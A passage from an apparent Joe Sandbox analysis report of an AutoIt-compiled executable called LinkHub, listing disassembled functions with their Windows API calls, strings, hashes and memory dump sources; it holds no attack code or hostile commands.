1022 cc88fa 1008->1022 1011->874 1013->821 1029 cc87b4-cc87ba 1013->1029 1024 cc881c-cc883f 1017->1024 1018->1024 1022->874 1027 cc884d-cc8850 1024->1027 1028 cc8841-cc8848 1024->1028 1030 cc8860-cc8863 1027->1030 1031 cc8852-cc885b 1027->1031 1028->1027 1029->874 1032 cc8865-cc886e 1030->1032 1033 cc8873-cc8876 1030->1033 1031->1030 1032->1033 1033->874 1034 cc887c-cc888a 1033->1034 1034->874
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                    • API String ID: 0-4285391669
                                                                    • Opcode ID: 8f5eae234e83647799e884c1b6bfcb6e381dd15eeb752870c2e294154386f04c
                                                                    • Instruction ID: b3b938213d9d78ad30c80794b0895e2250e5113c39071a29dbf72a0717041893
                                                                    • Opcode Fuzzy Hash: 8f5eae234e83647799e884c1b6bfcb6e381dd15eeb752870c2e294154386f04c
                                                                    • Instruction Fuzzy Hash: C36248745083419FC724DF25C095BAABBE1FF89308F10895EE4998B3A1DB71DA49CF92
                                                                    Function 00C735B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1035 c735b3-c73623 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C735E1
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C73602
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C73368,?), ref: 00C73616
                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C73368,?), ref: 00C7361F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 20df992f77b766427fc9f2d63933ab845db4aa4c25f77b39b54a30f652d4b0fa
                                                                    • Instruction ID: 1c3873874db147c698ec8f921154a66610d06060d2c0e854ccea78be4e756b26
                                                                    • Opcode Fuzzy Hash: 20df992f77b766427fc9f2d63933ab845db4aa4c25f77b39b54a30f652d4b0fa
                                                                    • Instruction Fuzzy Hash: FDF0B7796403947BE7215F976C0CF373EBEDBC7F50B40041EB908E62A0D6691895DAB0
                                                                    Function 00CE1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1036 ce1196-ce11bf InterlockedExchange 1037 ce11cd-ce11f6 call c9017b ReadFile 1036->1037 1038 ce11c1-ce11c8 call c9017b 1036->1038 1043 ce12ae-ce12b2 1037->1043 1044 ce11fc-ce1200 1037->1044 1038->1037 1047 ce12b4-ce12b7 call c90184 1043->1047 1048 ce12c1-ce12d0 InterlockedExchange 1043->1048 1045 ce12a8-ce12ab 1044->1045 1046 ce1206-ce121b EnterCriticalSection 1044->1046 1045->1043 1049 ce121d-ce122c 1046->1049 1050 ce1269-ce12a2 call c91190 LeaveCriticalSection ReadFile 1046->1050 1055 ce12bc-ce12c0 1047->1055 1053 ce122e 1049->1053 1054 ce1234-ce1266 call cb2430 call c9017b call c91190 call c90184 1049->1054 1050->1044 1050->1045 1053->1054 1054->1050 1055->1048
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CE11B3
                                                                    • ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00CE11EE
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00CE120A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00CE1283
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00CE129A
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE12C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3368777196-0
                                                                    • Opcode ID: 73eb680fcffffd4b50c2a78669457b0ea9649945994323cf3f3d69de23b37f6e
                                                                    • Instruction ID: 89979f0e2e3f57fbb76d874aa01fc08ec8484215ce3f7fde296a04a5e19d7654
                                                                    • Opcode Fuzzy Hash: 73eb680fcffffd4b50c2a78669457b0ea9649945994323cf3f3d69de23b37f6e
                                                                    • Instruction Fuzzy Hash: 5C416B71900205EFDF049F94DC89AAAB7B9FF04710F1480A5EE04EB296DB30DE61DBA4
                                                                    Function 00C761A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CB5287
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C76299
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                    • String ID: Line %d: $AutoIt -
                                                                    • API String ID: 2289894680-4094128768
                                                                    • Opcode ID: ca9e7381f46c2f9fc9b4d00e9ec3693870e6144e215f07b831382236751eb89d
                                                                    • Instruction ID: b0d8d2295f2788975a5a0010e21121d51edf671bad0af084d889046dbba1650a
                                                                    • Opcode Fuzzy Hash: ca9e7381f46c2f9fc9b4d00e9ec3693870e6144e215f07b831382236751eb89d
                                                                    • Instruction Fuzzy Hash: 7441B3714087046FC711EB60DC45BEF77E8AF59320F00861EF59D821A1EB709A49D7A2
                                                                    Function 00C758CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1116 c758cb-c758d6 1117 c75948-c7594a 1116->1117 1118 c758d8-c758dd 1116->1118 1120 c7593b-c7593e 1117->1120 1118->1117 1119 c758df-c758f7 RegOpenKeyExW 1118->1119 1119->1117 1121 c758f9-c75918 RegQueryValueExW 1119->1121 1122 c7592f-c7593a RegCloseKey 1121->1122 1123 c7591a-c75925 1121->1123 1122->1120 1124 c75927-c75929 1123->1124 1125 c7593f-c75946 1123->1125 1126 c7592d 1124->1126 1125->1126 1126->1122
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C758BE,SwapMouseButtons,00000004,?), ref: 00C758EF
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C758BE,SwapMouseButtons,00000004,?), ref: 00C75910
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00C758BE,SwapMouseButtons,00000004,?), ref: 00C75932
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: e037f29a27f85675c57c75ab9564c9aacdac5d399c598e032b65a217ddc45fea
                                                                    • Instruction ID: 66525a3d22eaf23a797f7c348a046ed4485e19c90154dcf12fecc664f222b068
                                                                    • Opcode Fuzzy Hash: e037f29a27f85675c57c75ab9564c9aacdac5d399c598e032b65a217ddc45fea
                                                                    • Instruction Fuzzy Hash: 81117C75510618FFEB218FA4CC80EAFB7B9EF00760F108419F919E7210E2719E429760
                                                                    Function 00C7F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Variable must be of type 'Object'., xrefs: 00CC48C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.
                                                                    • API String ID: 0-109567571
                                                                    • Opcode ID: 0d9f803da6ffa1ee6318dddaf6f224ba122289499dbeb45eb633402fbd2d4d48
                                                                    • Instruction ID: 777b65579e6483c9e89bb5909bd5168742fc785ac2b4ca417e3c3cfd084d825d
                                                                    • Opcode Fuzzy Hash: 0d9f803da6ffa1ee6318dddaf6f224ba122289499dbeb45eb633402fbd2d4d48
                                                                    • Instruction Fuzzy Hash: 6EC28875A00204DFCB24DF98C894BADB7F1BF09314F24816DE929AB391D771AE42DB91
                                                                    Function 00C9014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00C909D8
                                                                      • Part of subcall function 00C93614: RaiseException.KERNEL32(?,?,?,00C909FA,74DE2E40,?,?,?,?,?,?,?,00C909FA,?,00D39758), ref: 00C93674
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00C909F5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: dc604efe6b038f90e1980580da221e5f4d1748d5506d2c6db306bc4fdcf2a100
                                                                    • Instruction ID: c378ec8d32e5204fdd018fb763e34a9cbcb3b85f7a4c69f8520f30fc3db024fd
                                                                    • Opcode Fuzzy Hash: dc604efe6b038f90e1980580da221e5f4d1748d5506d2c6db306bc4fdcf2a100
                                                                    • Instruction Fuzzy Hash: E7F0C23490060CBF8F00BBA5EC5E89E777C5F01350B704120B924965E2FB71EB5AD6D0
                                                                    Function 00CF89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00CF8D52
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00CF8D59
                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00CF8F3A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                    • String ID:
                                                                    • API String ID: 146820519-0
                                                                    • Opcode ID: 0aa70967bab20d657dba86b61fdb86f7b1dcd57c9314e8ef07ad69d3fd79aea9
                                                                    • Instruction ID: 71b9a41d714c5af05f53dd96a1da620b3e07365879cfb623ac697811f41517cf
                                                                    • Opcode Fuzzy Hash: 0aa70967bab20d657dba86b61fdb86f7b1dcd57c9314e8ef07ad69d3fd79aea9
                                                                    • Instruction Fuzzy Hash: C5127C71A083459FC754DF24C484B6ABBE5FF88318F14895DE9998B392CB30ED49CB92
                                                                    Function 00CF9AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_strcat
                                                                    • String ID:
                                                                    • API String ID: 306214811-0
                                                                    • Opcode ID: 0ae162324a00144ef8560ffba80bc7c3b12273dff2c7652b2ceee98737fbf186
                                                                    • Instruction ID: f161b1883746ee56c2d82dec1d96a76890e4afcf39788aa93e9f23a24cba2495
                                                                    • Opcode Fuzzy Hash: 0ae162324a00144ef8560ffba80bc7c3b12273dff2c7652b2ceee98737fbf186
                                                                    • Instruction Fuzzy Hash: 56A16C31600609EFCF18DF19D5D1AA9B7E1FF45314B2084ADE91A8F292DB31ED42DB81
                                                                    Function 00C72793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C732AF
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C732B7
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C732C2
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C732CD
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C732D5
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C732DD
                                                                      • Part of subcall function 00C73205: RegisterWindowMessageW.USER32(00000004,?,00C72964), ref: 00C7325D
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C72A0A
                                                                    • OleInitialize.OLE32 ref: 00C72A28
                                                                    • CloseHandle.KERNELBASE(00000000,00000000), ref: 00CB3A0D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 1986988660-0
                                                                    • Opcode ID: d2d1d3d25a5d60f3a2f915e160c52d7bc8c7e21f4e41a1b63530e6853dd3b6f0
                                                                    • Instruction ID: cc8eb196f34eb2436bfd9fd5c4e6224cbd23c94c67b84476e37f4a49cadece22
                                                                    • Opcode Fuzzy Hash: d2d1d3d25a5d60f3a2f915e160c52d7bc8c7e21f4e41a1b63530e6853dd3b6f0
                                                                    • Instruction Fuzzy Hash: 627156B89113448FC788EFB9AD696393AF1FB9A3147D0812AB00DC73A2EB7045419F74
                                                                    Function 00CA8A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,00CA894C,?,00D39CE8,0000000C), ref: 00CA8A84
                                                                    • GetLastError.KERNEL32(?,00CA894C,?,00D39CE8,0000000C), ref: 00CA8A8E
                                                                    • __dosmaperr.LIBCMT ref: 00CA8AB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 2583163307-0
                                                                    • Opcode ID: de7c1f20760b6dd8eb82da8d9a46be6c6ed892840b7f050bd9102ae458e81d30
                                                                    • Instruction ID: b9405d3672c8feadff543b00b93485ebd3f049ed42b8ba8c82df0ae829ec7dbd
                                                                    • Opcode Fuzzy Hash: de7c1f20760b6dd8eb82da8d9a46be6c6ed892840b7f050bd9102ae458e81d30
                                                                    • Instruction Fuzzy Hash: 130126336156625BCB246274AC46B7E67495B8373CF29021BF938DB2D2DF308EC9B190
                                                                    Function 00CA970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00CA97BA,FF8BC369,00000000,00000002,00000000), ref: 00CA9744
                                                                    • GetLastError.KERNEL32(?,00CA97BA,FF8BC369,00000000,00000002,00000000,?,00CA5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C96F41), ref: 00CA974E
                                                                    • __dosmaperr.LIBCMT ref: 00CA9755
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 2336955059-0
                                                                    • Opcode ID: 13b33566252c294cf5873d1ecb66fde1d386764441cdcc21c55d64d2cf6d93e1
                                                                    • Instruction ID: 7e1901d5c7b381d7db8c1210534779422365fe4a055e7a33284509fcbb1038d7
                                                                    • Opcode Fuzzy Hash: 13b33566252c294cf5873d1ecb66fde1d386764441cdcc21c55d64d2cf6d93e1
                                                                    • Instruction Fuzzy Hash: C6014037630615ABCF059F99DC06C6F371ADB86334B240209F811D7290EA30DE81D7B0
                                                                    Function 00CE0D18 Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00CE0B03,00000000,?,00000000,?,00CB3A00,00000000), ref: 00CE0D2E
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00CE0B03,00000000,?,00000000,?,00CB3A00,00000000), ref: 00CE0D36
                                                                    • DuplicateHandle.KERNELBASE(00000000,?,00CE0B03,00000000,?,00000000,?,00CB3A00,00000000), ref: 00CE0D3D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcess$DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 1294930198-0
                                                                    • Opcode ID: 3c48275c5a67420c8ebf85f2e9f747bde5f0696b907ad464ba45fe34ee6901bc
                                                                    • Instruction ID: 3229c189ebe2f9afdbd727aadaa97157b0edcb3328ea278f824cad28a16839c4
                                                                    • Opcode Fuzzy Hash: 3c48275c5a67420c8ebf85f2e9f747bde5f0696b907ad464ba45fe34ee6901bc
                                                                    • Instruction Fuzzy Hash: 9AD05E77140306BBC7021BD6EC09F3B7B7EDBC6B22F20401AF60DC62509AB0A6409772
                                                                    Function 00C82B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 00C83006
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer
                                                                    • String ID: CALL
                                                                    • API String ID: 1385522511-4196123274
                                                                    • Opcode ID: f8092a7c0c7c51f967b6b5fa9e987869dfa524de091ae650f83d8f7b611d83b6
                                                                    • Instruction ID: 97a3da6e915ea9194098b2de72a9f5f9d5bf8ae8bf3da6dc399d9d15230d0495
                                                                    • Opcode Fuzzy Hash: f8092a7c0c7c51f967b6b5fa9e987869dfa524de091ae650f83d8f7b611d83b6
                                                                    • Instruction Fuzzy Hash: 07228B706082419FC714EF25C888B2ABBF1FF94318F24895DF49A8B3A1D771EA41DB56
                                                                    Function 00C73A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00CB413B
